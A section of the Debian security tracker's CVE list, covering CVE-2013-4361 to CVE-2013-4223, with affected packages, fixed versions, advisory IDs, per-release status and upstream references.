CVE-2013-4361 (The fbld instruction emulation in Xen 3.3.x through 4.3.x does not use ...)
	{DSA-3006-1}
	- xen 4.4.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-4360
	REJECTED
CVE-2013-4359 (Integer overflow in kbdint.c in mod_sftp in ProFTPD 1.3.4d and 1.3.5r3 ...)
	{DSA-2767-1}
	- proftpd-dfsg 1.3.5~rc3-2.1 (bug #723179)
CVE-2013-4358 (libavcodec/h264.c in FFmpeg before 0.11.4 allows remote attackers to c ...)
	- libav 6:9.1-1
	[wheezy] - libav (Vulnerable code not present)
	- ffmpeg (Vulnerable code not present)
	NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=072be3e8969f24113d599444be4d6a0ed04a6602
CVE-2013-4357 (The eglibc package before 2.14 incorrectly handled the getaddrinfo() f ...)
	{DLA-165-1}
	- eglibc 2.17-1 (unimportant; bug #742925)
	[wheezy] - eglibc 2.13-38+deb7u6
	NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=12671
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=797096
	NOTE: https://sourceware.org/git/?p=glibc.git;a=commit;h=f2962a71959fd254a7a223437ca4b63b9e81130c
	NOTE: https://sourceware.org/git/?p=glibc.git;a=commit;h=34a9094f49241ebb72084c536cf468fd51ebe3ec
	NOTE: https://sourceware.org/git/?p=glibc.git;a=commit;h=c8fc0c91695b1c7003c7170861274161f9224817
	NOTE: Fixed upstream in 2.14
CVE-2013-4356 (Xen 4.3.x writes hypervisor mappings to certain shadow pagetables when ...)
	- xen 4.4.0-1
	[wheezy] - xen (Only affects 4.3+)
	[squeeze] - xen (Only affects 4.3+)
CVE-2013-4355 (Xen 4.3.x and earlier does not properly handle certain errors, which a ...)
	{DSA-3006-1}
	- xen 4.4.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-4354 (The API before 2.1 in OpenStack Image Registry and Delivery Service (G ...)
	- glance (unimportant)
	NOTE: https://bugs.launchpad.net/glance/+bug/1226078
	NOTE: according to upstream bug there will probably not be a patch for this issue
CVE-2013-4353 (The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1. ...)
	{DSA-2837-1}
	- openssl 1.0.1f-1
	[squeeze] - openssl (Only affects 1.0.1 to 1.0.1e)
CVE-2013-4352 (The cache_invalidate function in modules/cache/cache_storage.c in the ...)
	- apache2 2.4.7-1 (low)
	[wheezy] - apache2 (Only affects 2.4.[56])
	[squeeze] - apache2 (Only affects 2.4.[56])
CVE-2013-4351 (GnuPG 1.4.x, 2.0.x, and 2.1.x treats a key flags subpacket with all bi ...)
	{DSA-2774-1 DSA-2773-1}
	- gnupg 1.4.15-1 (low; bug #722722)
	- gnupg2 2.0.22-1 (low; bug #722724)
CVE-2013-4350 (The IPv6 SCTP implementation in net/sctp/ipv6.c in the Linux kernel th ...)
	- linux-2.6 (Vulnerable code not present)
	- linux 3.11.5-1
	[wheezy] - linux 3.2.53-1
	NOTE: https://www.openwall.com/lists/oss-security/2013/09/13/2
	NOTE: http://git.kernel.org/cgit/linux/kernel/git/davem/net.git/commit/?id=95ee62083cb6453e056562d91f597552021e6ae7
CVE-2013-4349
	REJECTED
CVE-2013-4348 (The skb_flow_dissect function in net/core/flow_dissector.c in the Linu ...)
	- linux 3.11.6-2
	- linux-2.6 (Introduced in 3.2)
	[wheezy] - linux 3.2.53-2
CVE-2013-4347 (The (1) make_nonce, (2) generate_nonce, and (3) generate_verifier func ...)
	- python-oauth2 (low; bug #722657)
	[wheezy] - python-oauth2 (Minor issue)
	NOTE: https://www.openwall.com/lists/oss-security/2013/09/12/5
	NOTE: https://github.com/simplegeo/python-oauth2/issues/9
CVE-2013-4346 (The Server.verify_request function in SimpleGeo python-oauth2 does not ...)
	- python-oauth2 (low; bug #722656)
	[wheezy] - python-oauth2 (Minor issue)
	NOTE: https://www.openwall.com/lists/oss-security/2013/09/12/5
	NOTE: https://github.com/simplegeo/python-oauth2/issues/129
CVE-2013-4345 (Off-by-one error in the get_prng_bytes function in crypto/ansi_cprng.c ...)
	{DSA-2906-1}
	- linux-2.6
	- linux 3.11.5-1
	[wheezy] - linux 3.2.53-1
CVE-2013-4344 (Buffer overflow in the SCSI implementation in QEMU, as used in Xen, wh ...)
	{DSA-2933-1 DSA-2932-1}
	- xen 4.2-1
	[wheezy] - xen (Vulnerable code not present in the bundled 0.10 qemu)
	[squeeze] - xen (Unsupported in squeeze-lts)
	- qemu 1.6.0+dfsg-2 (unimportant; bug #725944)
	- qemu-kvm (unimportant)
	- xen-qemu-dm-4.0
	[squeeze] - xen-qemu-dm-4.0 (Unsupported in squeeze-lts)
	NOTE: Qemu only exploitable by privileged administrator with malicious configuration
	NOTE: Xen in Squeeze uses a separate source package: xen-qemu-dm-4.0
	NOTE: Xen in Wheezy includes qemu
	NOTE: Xen after Wheezy uses qemu-system-x86 from qemu, marking 4.2 as pseudo fixed
CVE-2013-4343 (Use-after-free vulnerability in drivers/net/tun.c in the Linux kernel ...)
	- linux 3.11.5-1
	[wheezy] - linux (Introduced in 3.8)
	- linux-2.6 (Introduced in 3.8)
CVE-2013-4342 (xinetd does not enforce the user and group configuration directives fo ...)
	- xinetd 1:2.3.15-2 (bug #324678)
	[wheezy] - xinetd 1:2.3.14-7.1+deb7u1
	[squeeze] - xinetd (Minor issue)
CVE-2013-4341 (Multiple cross-site scripting (XSS) vulnerabilities in Moodle through ...)
	- moodle 2.5.2-1
	[squeeze] - moodle (Unsupported in squeeze-lts)
CVE-2013-4340 (wp-admin/includes/post.php in WordPress before 3.6.1 allows remote aut ...)
	{DSA-2757-1}
	- wordpress 3.6.1+dfsg-1 (bug #722537)
	NOTE: http://core.trac.wordpress.org/changeset/25321
CVE-2013-4339 (WordPress before 3.6.1 does not properly validate URLs before use in a ...)
	{DSA-2757-1}
	- wordpress 3.6.1+dfsg-1 (bug #722537)
	NOTE: http://core.trac.wordpress.org/changeset/25323
	NOTE: http://core.trac.wordpress.org/changeset/25324
CVE-2013-4338 (wp-includes/functions.php in WordPress before 3.6.1 does not properly ...)
	{DSA-2757-1}
	- wordpress 3.6.1+dfsg-1 (bug #722537)
	NOTE: http://core.trac.wordpress.org/changeset/25325
CVE-2013-4337
	REJECTED
CVE-2013-4336
	REJECTED
CVE-2013-4335 (opOpenSocialPlugin 0.8.2.1, > 0.9.9.2, 0.9.13, 1.2.6: Multiple XML ...)
	NOT-FOR-US: opOpenSocialPlugin
CVE-2013-4334 (opWebAPIPlugin 0.5.1, 0.4.0, and 0.1.0: XXE Vulnerabilities ...)
	NOT-FOR-US: opWebAPIPlugin
CVE-2013-4333 (OpenPNE 3 versions 3.8.7, 3.6.11, 3.4.21.1, 3.2.7.6, 3.0.8.5 has an Ex ...)
	NOT-FOR-US: OpenPNE
CVE-2013-4332 (Multiple integer overflows in malloc/malloc.c in the GNU C Library (ak ...)
	{DLA-165-1}
	- glibc 2.17-93 (bug #722536)
	- eglibc
	[wheezy] - eglibc 2.13-38+deb7u1
CVE-2013-4331 (Light Display Manager (aka LightDM) 1.4.x before 1.4.3, 1.6.x before 1 ...)
	- lightdm 1.6.2-1 (bug #721744)
	[wheezy] - lightdm (Introduced in 1.4)
CVE-2013-4330 (Apache Camel before 2.9.7, 2.10.0 before 2.10.7, 2.11.0 before 2.11.2, ...)
	NOT-FOR-US: Apache Camel
CVE-2013-4329 (The xenlight library (libxl) in Xen 4.0.x through 4.2.x, when IOMMU is ...)
	{DSA-3006-1}
	- xen 4.3.0-1
	[squeeze] - xen (libxl not packaged in squeeze)
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-09/msg00001.html
CVE-2013-4328
	REJECTED
CVE-2013-4327 (systemd does not properly use D-Bus for communication with a polkit au ...)
	{DSA-2777-1}
	- systemd 204-5 (bug #723713)
CVE-2013-4326 (RealtimeKit (aka rtkit) 0.5 does not properly use D-Bus for communicat ...)
	- rtkit 0.10-3 (bug #723714)
	[wheezy] - rtkit 0.10-2+wheezy1
CVE-2013-4325 (The check_permission_v1 function in base/pkit.py in HP Linux Imaging a ...)
	{DSA-2829-1}
	- hplip 3.13.9-1 (bug #723716)
CVE-2013-4324 (spice-gtk 0.14, and possibly other versions, invokes the polkit author ...)
	- spice-gtk 0.21-0nocelt1 (low)
	[wheezy] - spice-gtk (Minor issue)
CVE-2013-4323
	RESERVED
CVE-2013-4322 (Apache Tomcat before 6.0.39, 7.x before 7.0.50, and 8.x before 8.0.0-R ...)
	{DSA-3530-1 DSA-2897-1 DLA-91-1}
	- tomcat6 6.0.39
	- tomcat7 7.0.50
	- tomcat8 8.0.0
CVE-2013-4321 (The File Abstraction Layer (FAL) in TYPO3 6.0.x before 6.0.8 and 6.1.x ...)
	- typo3-src (All versions from 6.0.0 up to the development branch of 6.2)
CVE-2013-4320 (The File Abstraction Layer (FAL) in TYPO3 6.0.x before 6.0.9 and 6.1.x ...)
	- typo3-src (All versions from 6.0.0 up to the development branch of 6.2)
CVE-2013-4319 (pbs_mom in Terascale Open-Source Resource and Queue Manager (aka TORQU ...)
	{DSA-2770-1}
	- torque 2.4.16+dfsg-1.1 (bug #722306)
	NOTE: http://www.supercluster.org/pipermail/torqueusers/2013-September/016098.html
CVE-2013-4318 (File injection vulnerability in Ruby gem Features 0.3.0 allows remote ...)
	NOT-FOR-US: Ruby gem Features
	NOTE: https://www.openwall.com/lists/oss-security/2013/09/09/9
CVE-2013-4317 (In Apache CloudStack 4.1.0 and 4.1.1, when calling the CloudStack API ...)
	NOT-FOR-US: CloudStack
CVE-2013-4316 (Apache Struts 2.0.0 through 2.3.15.1 enables Dynamic Method Invocation ...)
	- libstruts1.2-java (Affects Struts 2.0.0 - Struts 2.3.15.1)
	NOTE: http://struts.apache.org/release/2.3.x/docs/s2-019.html
CVE-2013-4315 (Directory traversal vulnerability in Django 1.4.x before 1.4.7, 1.5.x ...)
	{DSA-2755-1}
	- python-django 1.5.3-1 (bug #722605)
CVE-2013-4314 (The X509Extension in pyOpenSSL before 0.13.1 does not properly handle ...)
	{DSA-2763-1}
	- pyopenssl 0.13-2.1 (bug #722055)
CVE-2013-4313 (Moodle through 2.2.11, 2.3.x before 2.3.9, 2.4.x before 2.4.6, and 2.5 ...)
	- moodle 2.5.2-1
	[squeeze] - moodle
CVE-2013-4312 (The Linux kernel before 4.4.1 allows local users to bypass file-descri ...)
	{DSA-3503-1 DSA-3448-1}
	- linux 4.3.3-6
	- linux-2.6
	NOTE: https://git.kernel.org/linus/712f4aad406bb1ed67f3f98d04c044191f0ff593 (v4.5-rc1)
	NOTE: First patch for mitigation in 4.3.3-6, 4.3.5-1 adds a second bit required, that is CVE-2016-2847
CVE-2013-4311 (libvirt 1.0.5.x before 1.0.5.6, 0.10.2.x before 0.10.2.8, and 0.9.12.x ...)
	- libvirt 1.1.3~rc1-1 (unimportant)
	NOTE: polkit support not activated in Debian build prior to 1.2.9.
	NOTE: sourcewise support for 3-arg pkcheck syntax in libvirt is included
	NOTE: since 0.9.12.3-1 in wheezy-security (and 1.1.3~rc1-1 in unstable). But we need
	NOTE: to wait for the pu in #726558 for policykit-1/0.105-3+deb7u1 and have a rebuild
	NOTE: of libvirt then.
	NOTE: Needs a build dependency on libpolkit-gobject-1-dev
CVE-2013-4310 (Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass ...)
	- libstruts1.2-java (Affects Struts 2.0.0 - Struts 2.3.15.1)
	NOTE: http://struts.apache.org/release/2.3.x/docs/s2-018.html
CVE-2013-4309
	RESERVED
CVE-2013-4308 (Cross-site scripting (XSS) vulnerability in pages/TalkpageHistoryView. ...)
	NOT-FOR-US: Mediawiki LiquidThreads extension
CVE-2013-4307 (Multiple cross-site scripting (XSS) vulnerabilities in repo/includes/E ...)
	NOT-FOR-US: Mediawiki Wikibase
CVE-2013-4306 (Cross-site request forgery (CSRF) vulnerability in api/ApiQueryCheckUs ...)
	NOT-FOR-US: Mediawiki CheckUser extension
CVE-2013-4305 (Cross-site scripting (XSS) vulnerability in contrib/example.php in the ...)
	- mediawiki-extensions (unimportant)
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=49070
	NOTE: Just an example file
CVE-2013-4304 (The CentralAuth extension for MediaWiki 1.19.x before 1.19.8, 1.20.x b ...)
	NOT-FOR-US: Mediawiki CentralAuth extension
CVE-2013-4303 (includes/libs/IEUrlExtension.php in the MediaWiki API in MediaWiki 1.1 ...)
	- mediawiki 1:1.19.8+dfsg-1 (unimportant)
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=52746
	NOTE: IE6 lacks so many security features that this doesn't matter
CVE-2013-4302 ((1) ApiBlock.php, (2) ApiCreateAccount.php, (3) ApiLogin.php, (4) ApiM ...)
	{DSA-2753-1}
	- mediawiki 1:1.19.8+dfsg-1
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=49090
CVE-2013-4301 (includes/resourceloader/ResourceLoaderContext.php in MediaWiki 1.19.x ...)
	- mediawiki 1:1.19.8+dfsg-1 (unimportant)
	[squeeze] - mediawiki
	NOTE: Full path disclosure irrelevant in Debian
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=46332
CVE-2013-4300 (The scm_check_creds function in net/core/scm.c in the Linux kernel bef ...)
	- linux 3.11.5-1
	[wheezy] - linux (Not exploitable by unprivileged users in 3.2)
	- linux-2.6 (Not exploitable by unprivileged users in 2.6.32)
CVE-2013-4299 (Interpretation conflict in drivers/md/dm-snap-persistent.c in the Linu ...)
	{DSA-2906-1}
	- linux-2.6
	- linux 3.11.6-2
	[wheezy] - linux 3.2.53-1
	NOTE: upstream commit: http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e9c6a182649f4259db704ae15a91ac820e63b0ca
CVE-2013-4297 (The virFileNBDDeviceAssociate function in util/virfile.c in libvirt 1. ...)
	- libvirt 1.1.2-2
	[jessie] - libvirt (Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a)
	[wheezy] - libvirt (Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a)
	[squeeze] - libvirt (Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=2dba0323ff0cec31bdcea9dd3b2428af297401f2
	NOTE: Introduced with 8aabd597b379db5ae1655e36dff4f10d5622830a, 1.0.6
CVE-2013-4296 (The remoteDispatchDomainMemoryStats function in daemon/remote.c in lib ...)
	{DSA-2764-1}
	- libvirt 1.1.4-1
	[squeeze] - libvirt (Vulnerable code not present, introduced by commit 158ba8730e44b7dd07a21ab90499996c5dec080a)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=158ba8730e44b7dd07a21ab90499996c5dec080a
	NOTE: Fix: http://libvirt.org/git/?p=libvirt.git;a=commitdiff;h=e7f400a110e2e3673b96518170bfea0855dd82c0
CVE-2013-4295 (The gadget renderer in Apache Shindig 2.5.0 for PHP allows remote atta ...)
	NOT-FOR-US: Apache Shindig
CVE-2013-4294 (The (1) mamcache and (2) KVS token backends in OpenStack Identity (Key ...)
	- keystone 2013.1.3-2 (bug #722505)
	[wheezy] - keystone (only affects Folsom release and above)
CVE-2013-4293 (The server in Red Hat JBoss Operations Network (JON) 3.1.2 logs passwo ...)
	NOT-FOR-US: Red Hat JBoss Operations Network
CVE-2013-4292 (libvirt 1.1.0 and 1.1.1 allows local users to cause a denial of servic ...)
	- libvirt 1.1.2~rc2-1 (bug #721325)
	[jessie] - libvirt (Introduced with 1.1.0)
	[wheezy] - libvirt (Introduced with 1.1.0)
	[squeeze] - libvirt (Introduced with 1.1.0)
CVE-2013-4291 (The virSecurityManagerSetProcessLabel function in libvirt 0.10.2.7, 1. ...)
	- libvirt 1.1.2-2
	[jessie] - libvirt (vulnerable code not introduced, introduced in 1.1.1)
	[wheezy] - libvirt (vulnerable code not introduced, introduced in 1.1.1)
	[squeeze] - libvirt (vulnerable code not introduced, introduced in 1.1.1)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=745aa55fbf3e076c4288d5ec3239f5a5d43508a6
CVE-2013-4290 (Stack-based buffer overflow in OpenJPEG before 1.5.2 allows remote att ...)
	- openjpeg (unimportant; bug #722540)
	NOTE: JP3D code not built in the binary package, see #722540
CVE-2013-4289 (Multiple integer overflows in lib/openjp3d/jp3d.c in OpenJPEG before 1 ...)
	- openjpeg (unimportant; bug #722540)
	NOTE: JP3D code not built in the binary package, see #722540
CVE-2013-4288 (Race condition in PolicyKit (aka polkit) allows local users to bypass ...)
	- policykit-1 0.105-3+nmu1 (low; bug #723717)
	[squeeze] - policykit-1 (The update only deprecates an API and introduces a new option for pkcheck, no src package uses this API)
	[wheezy] - policykit-1 (The update only deprecates an API and introduces a new option for pkcheck, no src package uses this API)
CVE-2013-4287 (Algorithmic complexity vulnerability in Gem::Version::VERSION_PATTERN ...)
	- rubygems 3.2.0~rc.1-1 (unimportant; bug #722361)
	- libgems-ruby (unimportant; bug #722361)
	NOTE: Non-issue, you trust the site providing the gem with installing arbitrary code, allowing
	NOTE: it a potential elevated CPU consumption doesn't add any extra harm
CVE-2013-4286 (Apache Tomcat before 6.0.39, 7.x before 7.0.47, and 8.x before 8.0.0-R ...)
	{DSA-3530-1 DSA-2897-1 DLA-91-1}
	- tomcat6 6.0.39
	- tomcat7 7.0.47
	- tomcat8 8.0.0
CVE-2013-4285 (A certain Gentoo patch for the PAM S/Key module does not properly clea ...)
	NOT-FOR-US: pam_skey
CVE-2013-4284 (Cumin, as used in Red Hat Enterprise MRG 2.4, allows remote attackers ...)
	NOT-FOR-US: Cumin
CVE-2013-4283 (ns-slapd in 389 Directory Server before 1.3.0.8 allows remote attacker ...)
	- 389-ds-base 1.3.2.9-1 (bug #721222)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=999634
CVE-2013-4282 (Stack-based buffer overflow in the reds_handle_ticket function in serv ...)
	{DSA-2839-1}
	- spice 0.12.4-0nocelt2 (bug #728314)
	NOTE: http://cgit.freedesktop.org/spice/spice/commit/?id=8af619009660b24e0b41ad26b30289eea288fcc2
CVE-2013-4281
	RESERVED
CVE-2013-4280 (Insecure temporary file vulnerability in RedHat vsdm 4.9.6. ...)
	- vdsm (bug #668538)
CVE-2013-4279 (imapsync 1.564 and earlier performs a release check by default, which ...)
	- imapsync
CVE-2013-4278 (The "create an instance" API in OpenStack Compute (Nova) Folsom, Grizz ...)
	- nova 2013.1.3-1 (bug #720602)
	[wheezy] - nova (Affected code not present)
	NOTE: incomplete fix for CVE-2013-2256
CVE-2013-4277 (Svnserve in Apache Subversion 1.4.0 through 1.7.12 and 1.8.0 through 1 ...)
	- subversion 1.7.13-1 (low; bug #721542)
	[squeeze] - subversion (Minor issue, PID file not created by default)
	[wheezy] - subversion (Minor issue, PID file not created by default)
	NOTE: http://subversion.apache.org/security/CVE-2013-4277-advisory.txt
CVE-2013-4276 (Multiple stack-based buffer overflows in LittleCMS (aka lcms or liblcm ...)
	- lcms 1.19.dfsg1-1.3 (low; bug #718682)
	[squeeze] - lcms (Minor issue)
	[wheezy] - lcms 1.19.dfsg2-1.2+deb7u1
	- lcms2 (Vulnerable code not present)
CVE-2013-4275 (Cross-site scripting (XSS) vulnerability in the zen_breadcrumb functio ...)
	NOT-FOR-US: Drupal contributed module Zen
CVE-2013-4274 (Cross-site scripting (XSS) vulnerability in the password_policy_admin_ ...)
	NOT-FOR-US: Drupal addon
CVE-2013-4273 (The Entity API module 7.x-1.x before 7.x-1.2 for Drupal does not prope ...)
	NOT-FOR-US: Drupal contributed module Entity API
CVE-2013-4272 (The BOTCHA Spam Prevention module 7.x-1.x before 7.x-1.6, 7.x-2.x befo ...)
	NOT-FOR-US: Drupal addon
CVE-2013-4271 (The default configuration of the ObjectRepresentation class in Restlet ...)
	- restlet (bug #596472)
CVE-2013-4270 (The net_ctl_permissions function in net/sysctl_net.c in the Linux kern ...)
	- linux-2.6 (Introduced in 3.8)
	- linux 3.11.5-1
	[wheezy] - linux (Introduced in 3.8)
	NOTE: Introduced with http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cff109768b2d9c03095848f4cd4b0754117262aa
	NOTE: Fixed by http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=2433c8f094a008895e66f25bd1773cdb01c91d01
CVE-2013-4269
	REJECTED
CVE-2013-4268
	REJECTED
CVE-2013-4267 (Ajaxeplorer before 5.0.1 allows remote attackers to execute arbitrary ...)
	- ajaxplorer (bug #668381)
CVE-2013-4266
	REJECTED
CVE-2013-4265 (The av_reallocp_array function in libavutil/mem.c in FFmpeg before 2.0 ...)
	- ffmpeg (Affected function codec not present in 0.5 ffmpeg)
	- libav (Affected function not present in libav)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/c94f9e854228e0ea00e1de8769d8d3f7cab84a55
CVE-2013-4264 (The kempf_decode_tile function in libavcodec/g2meet.c in FFmpeg before ...)
	- ffmpeg (g2meet codec not present in 0.5 ffmpeg)
	- libav (g2meet codec not present in libav)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/2960576378d17d71cc8dccc926352ce568b5eec1
CVE-2013-4263 (libavfilter in FFmpeg before 2.0.1 has unspecified impact and remote v ...)
	- ffmpeg (Affected video filters not present in ffmpeg 0.5)
	- libav (Vulnerable code not present)
	NOTE: https://github.com/FFmpeg/FFmpeg/commit/e43a0a232dbf6d3c161823c2e07c52e76227a1bc
	NOTE: [Anton] the report and the fix appear completely bogus, likely working around bugs from completely different parts of the code; most probably not present in any libav release
CVE-2013-4262 (svnwcsub.py in Subversion 1.8.0 before 1.8.3, when using the --pidfile ...)
	- subversion 1.8.5-1 (unimportant)
	NOTE: Optional admin-side utilities in Subversion 1.8.x
CVE-2013-4261 (OpenStack Compute (Nova) Folsom, Grizzly, and earlier, when using Apac ...)
	- nova 2013.2-1 (low)
	[wheezy] - nova (Will be fixed in a point update)
	NOTE: https://bugs.launchpad.net/nova/+bug/1215091/comments/10 (relevant question for other components)
	NOTE: probably does not affect Essex/2012.1, see https://bugs.launchpad.net/nova/+bug/1215091/comments/6
CVE-2013-4260 (lib/ansible/playbook/__init__.py in Ansible 1.2.x before 1.2.3, when p ...)
	- ansible (affected code introduced with ansible 1.2)
CVE-2013-4259 (runner/connection_plugins/ssh.py in Ansible before 1.2.3, when using C ...)
	- ansible 1.3.4+dfsg-1 (bug #721766)
	NOTE: upstream commit: https://github.com/ansible/ansible/commit/6bf5d195065bc23b5fc72ba690d7ed45f228aaf0
CVE-2013-4258 (Format string vulnerability in the osLogMsg function in server/os/aulo ...)
	{DSA-2771-1}
	- nas 1.9.3-6 (bug #720287)
CVE-2013-4257 [Heap Overflow]
	REJECTED
CVE-2013-4256 (Multiple stack-based and heap-based buffer overflows in Network Audio ...)
	{DSA-2771-1}
	- nas 1.9.3-6 (bug #720287)
CVE-2013-4255 (The policy definition evaluator in Condor 7.5.4, 8.0.0, and earlier do ...)
	- condor 8.0.5~dfsg.1-1 (bug #721693)
	[wheezy] - condor (Minor issue)
CVE-2013-4254 (The validate_event function in arch/arm/kernel/perf_event.c in the Lin ...)
	- linux 3.10.11-1
	[wheezy] - linux 3.2.51-1
	- linux-2.6 (No perf support on arm)
CVE-2013-4253
	RESERVED
CVE-2013-4252
	RESERVED
CVE-2013-4251 (The scipy.weave component in SciPy before 0.12.1 creates insecure temp ...)
	{DLA-26-1}
	- python-scipy 0.12.0-3 (bug #726093)
	[wheezy] - python-scipy (Minor issue)
	[squeeze] - python-scipy 0.7.2+dfsg1-1+deb6u1
	NOTE: https://github.com/scipy/scipy/commit/bd296e0336420b840fcd2faabb97084fd252a973
CVE-2013-4250 (The (1) file upload component and (2) File Abstraction Layer (FAL) in ...)
	- typo3-src (All versions from 6.0.0 up to the development branch of 6.2)
CVE-2013-4249 (Cross-site scripting (XSS) vulnerability in the AdminURLFieldWidget wi ...)
	- python-django 1.5.2-1
	[wheezy] - python-django (1.4.x not affected)
	[squeeze] - python-django (1.2.x not affected)
	NOTE: problem introduced with https://github.com/django/django/commit/ac2052ebc84c45709ab5f0f25e685bf656ce79bc
CVE-2013-4248 (The openssl_x509_parse function in openssl.c in the OpenSSL module in ...)
	{DSA-2742-1}
	- php5 5.5.3+dfsg-1 (bug #719765)
	NOTE: fix in 5.5.2 incomplete, see http://php.net/ChangeLog-5.php
CVE-2013-4247 (Off-by-one error in the build_unc_path_to_root function in fs/cifs/con ...)
	- linux-2.6 (Introduced in 3.8)
	- linux 3.9.6-1
	[wheezy] - linux (Introduced in 3.8)
CVE-2013-4246 (libsvn_fs_fs/fs_fs.c in Apache Subversion 1.8.x before 1.8.2 might all ...)
	- subversion (only affects 1.8.0 and 1.8.1)
CVE-2013-4245 (Orca has arbitrary code execution due to insecure Python module load ...)
	- gnome-orca (unimportant)
	NOTE: Negligible security impact
CVE-2013-4244 (The LZW decompressor in the gif2tiff tool in libtiff 4.0.3 and earlier ...)
	{DSA-2744-1}
	- tiff 4.0.3-3
	- tiff3 (The tiff3 source package doesn't build the TIFF tools)
CVE-2013-4243 (Heap-based buffer overflow in the readgifimage function in the gif2tif ...)
	{DSA-2965-1 DLA-0013-1}
	- tiff 4.0.3-9 (low; bug #742917)
	- tiff3 (The tiff3 source package doesn't build the TIFF tools)
	[squeeze] - tiff 3.9.4-5+squeeze11
	NOTE: http://bugzilla.maptools.org/show_bug.cgi?id=2451
CVE-2013-4242 (GnuPG before 1.4.14, and Libgcrypt before 1.5.3 as used in GnuPG 2.0.x ...)
	{DSA-2731-1 DSA-2730-1}
	- gnupg 1.4.14-1 (bug #717880)
	- libgcrypt11 1.5.3-1
CVE-2013-4241 (Multiple cross-site scripting (XSS) vulnerabilities in the HMS Testimo ...)
	NOT-FOR-US: WordPress plugin HMS Testimonials
CVE-2013-4240 (Multiple cross-site request forgery (CSRF) vulnerabilities in the HMS ...)
	NOT-FOR-US: WordPress plugin HMS Testimonials
CVE-2013-4239 (The xenDaemonListDefinedDomains function in xen/xend_internal.c in lib ...)
	- libvirt 1.1.2~rc1-1 (bug #719533)
	[wheezy] - libvirt (Introduced in 1.1.1)
	[squeeze] - libvirt (Introduced in 1.1.1)
	NOTE: Introduced by: http://libvirt.org/git/?p=libvirt.git;a=commit;h=632180d1
	NOTE: Fixed by: http://libvirt.org/git/?p=libvirt.git;a=commit;h=0e671a16
CVE-2013-4238 (The ssl.match_hostname function in the SSL module in Python 2.6 throug ...)
	{DSA-2880-1 DLA-25-1}
	- python2.5 (low)
	[squeeze] - python2.5 (Minor issue)
	- python2.6 (low)
	[wheezy] - python2.6 (Minor issue)
	- python2.7 2.7.5-8 (low; bug #719566)
	- python3.1 (low)
	[squeeze] - python3.1 (Minor issue)
	- python3.2 (low; bug #719568)
	[wheezy] - python3.2 (Minor issue)
	- python3.3 3.3.2-6 (low; bug #719567)
	NOTE: http://bugs.python.org/issue18709
	NOTE: https://bugs.mageia.org/show_bug.cgi?id=10989
CVE-2013-4237 (sysdeps/posix/readdir_r.c in the GNU C Library (aka glibc or libc6) 2. ...)
	{DLA-165-1}
	- eglibc
	- glibc 2.17-94 (bug #719558)
	[wheezy] - eglibc 2.13-38+deb7u1
	NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=14699
	NOTE: http://sourceware.org/ml/libc-alpha/2013-05/msg00445.html
CVE-2013-4236 (VDSM in Red Hat Enterprise Virtualization 3 and 3.2 allows privileged ...)
	- vdsm (bug #668538)
CVE-2013-4235 (shadow: TOCTOU (time-of-check time-of-use) race condition when copying ...)
	- shadow (unimportant; bug #778950)
CVE-2013-4234 (Multiple heap-based buffer overflows in the (1) abc_MIDI_drum and (2) ...)
	{DSA-2751-1}
	- libmodplug 1:0.8.8.4-4 (bug #719462)
CVE-2013-4233 (Integer overflow in the abc_set_parts function in load_abc.cpp in libm ...)
	{DSA-2751-1}
	- libmodplug 1:0.8.8.4-4 (bug #719462)
CVE-2013-4232 (Use-after-free vulnerability in the t2p_readwrite_pdf_image function i ...)
	{DSA-2744-1}
	- tiff 4.0.3-2 (bug #719303)
	- tiff3 (The tiff3 source package doesn't build the TIFF tools)
CVE-2013-4231 (Multiple buffer overflows in libtiff before 4.0.3 allow remote attacke ...)
	{DSA-2744-1}
	- tiff 4.0.3-2 (bug #719303)
	- tiff3 (The tiff3 source package doesn't build the TIFF tools)
CVE-2013-4230 (The mm_webform submodule in the Monster Menus module 6.x-6.x before 6. ...)
	NOT-FOR-US: Monster Menus Drupal contributed module
CVE-2013-4229 (Cross-site scripting (XSS) vulnerability in the Monster Menus module 7 ...)
	NOT-FOR-US: Monster Menus Drupal contributed module
CVE-2013-4228 (The OG access fields (visibility fields) implementation in Organic Gro ...)
	NOT-FOR-US: Organic Group Drupal contributed module
CVE-2013-4227 (Cross-site request forgery (CSRF) vulnerability in the persona_xsrf_to ...)
	NOT-FOR-US: Persona Drupal contributed module
CVE-2013-4226 (The Authenticated User Page Caching (Authcache) module 7.x-1.x before ...)
	NOT-FOR-US: Authenticated User Page Caching Drupal contributed module
CVE-2013-4225 (The RESTful Web Services (restws) module 7.x-1.x before 7.x-1.4 and 7. ...)
	NOT-FOR-US: RESTful Web Services (RESTWS) Drupal contributed module
CVE-2013-4224
	REJECTED
CVE-2013-4223 (The Gentoo Nullmailer package before 1.11-r2 uses world-readable permi ...)
	- nullmailer 1:1.11-2 (low; bug #684619)
	[squeeze] - nullmailer (Minor issue)
	NOTE: CVE originally for /etc/nullmailer/remotes permissions in gentoo, but Debian
	NOTE: had the same problem until 1:1.11-2
